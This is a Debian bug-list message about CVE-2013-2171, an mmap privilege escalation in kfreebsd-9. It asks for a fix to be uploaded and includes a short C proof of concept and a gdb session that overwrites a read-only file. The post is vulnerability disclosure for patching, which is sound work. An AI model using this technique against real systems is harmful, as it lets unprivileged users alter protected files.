[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap

Hi Christoph,

Please could you do an upload of SVN r4525 to unstable?

kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm
now that the fix works too.

Unfortunately the vulnerability is as simple and as serious as it
sounds.  A non-privileged user can overwrite any file having only read

# cat /etc/foo

$ gdb testcase

(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400631 in main () at main.c:13
13              *ptr = 0; /* this will segfault */
(gdb) set {char}(ptr+9) = 0x30

# cat /etc/foo

Steven Chamberlain
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>

int main() {
        FILE *fp = fopen("/etc/foo", "r");
        int fd = fileno (fp);

        unsigned char *ptr = mmap (NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
        if (ptr <= 0) return -1;

        *ptr = 0; /* this will segfault */
        return 0;

Reply to: